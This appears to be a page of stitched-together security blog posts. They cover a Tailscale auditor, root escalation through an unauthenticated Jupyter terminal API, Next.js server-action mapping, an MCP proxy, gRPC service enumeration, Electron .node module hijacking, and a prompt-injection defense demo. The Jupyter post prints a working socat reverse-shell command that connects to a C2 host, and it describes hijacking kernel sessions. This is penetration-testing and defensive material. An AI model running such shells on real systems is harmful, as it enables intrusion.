The tool is more important than the blog post; it does everything automatically for you: https://github.com/Adversis/tailsnitch
A security auditor for Tailscale configurations. Scans your tailnet for misconfigurations, overly permissive access controls, and security best practice violations.
And if you just want the checklist: https://github.com/Adversis/tailsnitch/blob/main/HARDENING_TAILSCALE.md
This is not a vulnerability in Jupyter. This is a code execution feature working as designed. When Jupyter is properly configured with token authentication (the default), this technique wouldn't work. The issue comes about when administrators disable security features and run Jupyter with elevated privileges—a dangerous combination on a shared machine.
For those unfamiliar, Jupyter is the Swiss Army knife of data science—a web-based environment where researchers and analysts write code, visualize data, and document their findings all in one place. It’s code execution as a service, basically.
My first instinct was to check if the Jupyter server was accessible
It was. The API was responding, and even better—no authentication token required. This meant the server was either running with --NotebookApp.token='' or I was accessing it from a trusted network. Either way, Christmas came early.
Here's where things got a little more interesting. Jupyter's REST API documentation showed an interesting endpoint: /api/terminals. Unlike the kernel API (which executes Python code), the terminal API provides actual shell access. And I could create a terminal session fairly easily.
But there’s a catch. Terminals in Jupyter communicate over WebSocket, not HTTP. Traditional tools like curl or nc wouldn't work. I needed something that could speak WebSocket from the command line.
After some research, I discovered websocat—essentially netcat for WebSockets. It's a binary that bridges the gap between command-line tools and WebSocket services. Perfect for situations like this.
With websocat in hand, I could now interact with Jupyter's terminal WebSocket, but it wasn’t immediately obvious how to send commands from there terminal. The Jupyter Client WebSocket documentation on WebSocket protocols provides some details about how messages are passed between kernels and the Jupyter web application. And the Terminado client’s websocket implementation outlines the format needed to interact with Jupyter.
So when you connect to a Jupyter terminal via WebSocket, you're not getting a raw shell - you're talking to a protocol handler that expects JSON arrays where the
"stdin", "stdout", "setup", etc.)This lets Jupyter multiplex different data streams (input, output, control messages) over a single WebSocket connection. So sending ["stdin", "command"] is how you talk to Jupyter's terminal WebSocket protocol.
And when you connect, it seems to take a second to initialize the WebSocket connection, and it wouldn’t immediately take my commands, so the elegant solution is to sleep. And so, echoing a command like this:
UID 0? Of course, the Jupyter server was running as root, and the terminal API was giving me a root shell. No sudo required, no privilege escalation needed—just ask nicely and receive.
With root access through the terminal, I could now read Jupyter's runtime files:
These kernel connection files contained:
With these, I could connect directly to any running notebook kernel and execute code in other users' sessions. Session hijacking for data science.
For easier interaction, I established a proper reverse shell:
$ (sleep 1; echo '["stdin", "socat exec:\\"bash -li\\",pty,stderr,setsid,sigint,sane tcp:my.c2.server:4444 &\\n"]'; sleep 1; echo '["stdin", "exit\\n"]') | ./websocat "ws://localhost:8888/terminals/websocket/1"
Now I had a fully interactive root shell, running through Jupyter's own process. To any monitoring system, this might look like legitimate Jupyter activity.
This isn't a vulnerability in Jupyter—it's a deployment anti-pattern.
Together, these created a perfect storm. Any user with local access could escalate to root through Jupyter's intended functionality.
If you need multi-user Jupyter, use tools designed for it:
Need GPU access without root? Use capabilities:
Map out what users actually need:
If users legitimately need shell access, try isolate it properly.
Jupyter is great for interactive data science. The terminal API is genuinely useful for package installation and environment debugging. But these same features are ripe for abuse if deployed without proper consideration.
Downloading websocat and echoing commands is fine for janky use, but how about a little client to drop into a shell?
Check out jupyter-shell
Next.js server actions present an interesting challenge during penetration tests. These server-side functions appear in proxy tools as POST requests with hashed identifiers like a9fa42b4c7d1 in the Next-Action header, making it difficult to understand what each request actually does. When applications have productionBrowserSourceMaps enabled, this Burp extension NextjsServerActionAnalyzer bridges that gap by automatically mapping these hashes to their actual function names.
During a typical web application assessment, endpoints usually have descriptive names and methods: GET /api/user/1 clearly indicates its purpose. Next.js server actions work differently. They all POST to the same endpoint, distinguished only by hash values that change with each build. Without tooling, testers must manually track which hash performs which action—a time-consuming process that becomes impractical with larger applications.
The extension's effectiveness stems from understanding how Next.js bundles server actions in production. When productionBrowserSourceMaps is enabled, JavaScript chunks contain mappings between action hashes and their original function names.
The tool simply uses flexible regex patterns to extract these mappings from minified JavaScript.
The extension automatically scans proxy history for JavaScript chunks, identifies those containing createServerReference calls, and builds a comprehensive mapping of hash IDs to function names.
Rather than simply tracking which hash IDs have been executed, it tracks function names. This is important since the same function might have different hash IDs across builds, but the function name will remain constant.
For example, if deleteUserAccount() has a hash of a9f8e2b4c7d1 in one build and b7e3f9a2d8c5 in another, manually tracking these would see these as different actions. The extension recognizes they're the same function, providing accurate unused action detection even across multiple application versions.
A useful feature of the extension is its ability to transform discovered but unused actions into testable requests. When you identify an unused action like exportFinancialData(), the extension can automatically:
This removes the manual work of manually creating server action requests.
We recently assessed a Next.js application with dozens of server actions. The client had left productionBrowserSourceMaps enabled in their production environment—a common configuration that includes debugging information in JavaScript files. This presented an opportunity to improve our testing methodology.
Using the Burp extension, we:
updateUserProfile() and fetchReportData()
The function name mapping transformed our testing approach. Instead of tracking anonymous hashes, we could see that b7e3f9a2 mapped to deleteUserAccount() and c4d8b1e6 mapped to exportUserData(). This clarity helped us create more targeted test cases.
With the recent GitHub MCP vulnerability demonstrating how prompt injection can leverage overprivileged tokens to exfiltrate private repository data, I wanted to share our approach to MCP security through proxying.
The Core Problem: MCP tools often run with full access tokens (GitHub PATs with repo-wide access, AWS creds with AdminAccess, etc.) and no runtime boundaries. It's essentially pre-sandbox JavaScript with filesystem access. A single malicious prompt or compromised server can access everything.
Why Current Auth is Broken:
MCP Snitch: An open source security proxy that implements the mediation layer MCP lacks:
What It Doesn't Solve:
The browser security model took 25 years to evolve from "JavaScript can delete your file" to today's sandboxed processes with granular permissions. MCP needs the same evolution but the risks are immediate. Until IDEs implement proper sandboxing and MCP gets protocol-level security primitives, proxy-based security is the practical defense.
GitHub: github.com/Adversis/mcp-snitch
We were testing a black-box service for a client with an interesting software platform. They'd provided an SDK with minimal documentation—just enough to show basic usage, but none of the underlying service definitions. The SDK binary was obfuscated, and the gRPC endpoints it connected to had reflection disabled.
After spending too much time piecing together service names from SDK string dumps and network traces, we built grpc-scan to automate what we were doing manually: exploiting how gRPC implementations handle invalid requests to enumerate services without any prior knowledge.
Unlike REST APIs where you can throw curl at an endpoint and see what sticks, gRPC operates over HTTP/2 using binary Protocol Buffers. Every request needs:
Miss any of these and you get nothing useful. There's no OPTIONS request, typically limited documentation, no guessing /api/v1/users might exist. You either have the proto files or you're blind.
Most teams rely on server reflection—a gRPC feature that lets clients query available services. But reflection is usually disabled in production. It’s an information disclosure risk, yet developers rarely provide alternative documentation.
But gRPC have varying error messages which inadvertently leak service existence through different error codes:
# Calling non-existent\`unknown service FakeService``real service, wrong method``unknown method FakeMethod for service UserService``real service and method``missing authentication token`
These distinct responses let us map the attack surface. The tool automates this process, testing thousands of potential service/method combinations based on various naming patterns we've observed.
The enumeration engine does a few things
1. Even when reflection is "disabled," servers often still respond to reflection requests with errors that confirm the protocol exists. We use this for fingerprinting.
2. For a base word like "User", we generate likely services
UserUserServiceUsersUserAPIuser.Userapi.v1.Usercom.company.UserEach pattern tested with common method names: Get, List, Create, Update, Delete, Search, Find, etc.
3. Different gRPC implementations return subtly different error codes:
UNIMPLEMENTED vs NOT_FOUND for missing servicesINVALID_ARGUMENT vs INTERNAL for malformed requests4. gRPC's HTTP/2 foundation means we can multiplex hundreds of requests over a single TCP connection. The tool maintains a pool of persistent connections, improving scan speed.
What do we commonly see in pentests using RPC?
Service Sprawl from Migrations
SDK analysis often reveals parallel service implementations, for example
UserService - The original monolith endpointAccountManagementService - New microservice, full authUserDataService - Read-only split-off, inconsistent authUserProfileService - Another team's implementationThese typically emerge from partial migrations where different teams own different pieces. The older services often bypass newer security controls.
Method Proliferation and Auth Drift
Real services accumulate method variants over time, for example
GetUser - Original, added auth in v2GetUserDetails - Different team, no auth checkFetchUserByID - Deprecated but still activeGetUserWithPreferences - Calls GetUser internally, skips authSo newer methods that compose older ones sometimes bypass security checks the original methods later acquired.
Package Namespace Archaeology
Service discovery reveals organizational history
com.startup.api.Users - Original serviceplatform.users.v1.UserAPI - Post-merge standardization attemptinternal.batch.UserBulkService - "Internal only" but on same endpointEach namespace generation typically has different security assumptions. Internal services exposed on the same port as public APIs are surprisingly common—developers assume network isolation that doesn't exist.
UserService/CreateUser exists, but crafting a valid User message requires either the proto definition or guessing or reverse engineering of the SDK's serialization.Available at https://github.com/Adversis/grpc-scan. Pull requests welcome.
Compiled Node.js files (.node files) are compiled binary files that allow Node.js applications to interface with native code written in languages like C, C++, or Objective-C as native addon modules.
Unlike JavaScript files which are mostly readable, assuming they’re not obfuscated and minified, .node files are compiled binaries that can contain machine code and run with the same privileges as the Node.js process that loads them, without the constraints of the JavaScript sandbox. These extensions can directly call system APIs and perform operations that pure JavaScript code cannot, like making system calls.
These addons can use Objective-C++ to leverage native macOS APIs directly from Node.js. This allows arbitrary code execution outside the normal sandboxing that would constrain a typical Electron application.
When an Electron application uses a module that contains a compiled .node file, it automatically loads and executes the binary code within it. Many Electron apps use the ASAR (Atom Shell Archive) file format to package the application's source code. ASAR integrity checking is a security feature that checks the file integrity and prevents tampering with files within the ASAR archive. It is disabled by default.
When ASAR integrity is enabled, your Electron app will verify the header hash of the ASAR archive on runtime. If no hash is present or if there is a mismatch in the hashes, the app will forcefully terminate.
This prevents files from being modified within the ASAR archive. Note that it appears the integrity check is a string that you can regenerate after modifying files, then find and replace in the executable file as well. See more here.
But many applications run from outside the verified archive, under app.asar.unpacked since the compiled .node files (the native modules) cannot be executed directly from within an ASAR archive.
And so even with the proper security features enabled, a local attacker can modify or replace .node files within the unpacked directory - not so different than DLL hijacking on Windows.
We wrote two tools - one to find Electron applications that aren’t hardened against this, and one to simply compile Node.js addons.
.node filesAn interactive application that visualizes and demonstrates Google’s CaMeL (Capabilities for Machine Learning) security approach for defending against prompt injections in LLM agents.
Link to original paper: https://arxiv.org/pdf/2503.18813
All credit to the original researchers
title={Defeating Prompt Injections by Design}, author={Edoardo Debenedetti and Ilia Shumailov and Tianqi Fan and Jamie Hayes and Nicholas Carlini and Daniel Fabian and Christoph Kern and Chongyang Shi and Andreas Terzis and Florian Tramèr}, year={2025}, eprint={2503.18813}, archivePrefix={arXiv}, primaryClass={cs.CR}, url={https://arxiv.org/abs/2503.18813}, }